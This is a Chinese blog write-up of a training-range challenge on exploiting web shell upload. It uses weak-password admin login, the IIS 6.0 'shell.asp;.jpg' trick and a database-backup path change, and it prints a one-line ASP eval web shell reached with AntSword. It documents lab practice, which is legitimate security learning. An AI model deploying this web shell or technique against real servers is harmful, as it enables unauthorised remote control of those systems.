TypechoJoeTheme

mmzkyl

墨者学院靶场_WebShell文件上传漏洞分析溯源(第5题)

mmzkyl博主
2021-11-06
/
0 评论
/
180 阅读
/
285 个字
/
百度已收录
11/06
本文最后更新于2021年11月06日,已超过198天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!

随笔

  • 2021-11-06 14:52
    找到了两处可能能够写入shell的点
    • 管理文章处能够上传文件
    • 数据库备份路径以及文件名称能够被任意更改
  • 2021-11-06 15:10
    管理文章处直接上传一句话木马绕过没成功,又配合 IIS 6.0 上传 shell.asp;.jpg ,虽然上传成功了,但是上传成功的文件会被直接改名为 xxx.jpg,所以管理文章处应该是没戏了
  • 2021-11-06 15:39
    只能尝试从数据库备份下手了

目标靶场



解题步骤

  • 首页终于变了,终于看起来不像是钓鱼执法的漏洞点了
  • 通过网络响应尝试寻找服务器相关信息
  • 进入管理页看一下
  • 没啥信息,有个登陆点,进去看看
  • 一个挺朴素的登录界面
  • 使用弱口令试一下
    123456 admin admin123
  • 成功进入后台
  • 先写一个 shell.asp 留待后续使用
    asp <%eval request("mmzkyl")%>
  • 管理文章处,进入编辑界面
  • 获取到上传后的图片链接
    http /uploads/20211106154748064.jpg
  • 进入数据备份页面
  • 更改其路径配置
  • 备份成功
  • 尝试使用蚁剑进行连接
  • 连接成功,寻找相应Key提交即可
赞(1)
评论 (0)

互动读者

  • nmqberxi闲逛

    评论 1 次 | 文章 0 篇

  • ae888 casino闲逛

    评论 1 次 | 文章 0 篇

  • usd rub binance闲逛

    评论 1 次 | 文章 0 篇

  • mersin escort闲逛

    评论 1 次 | 文章 0 篇

标签云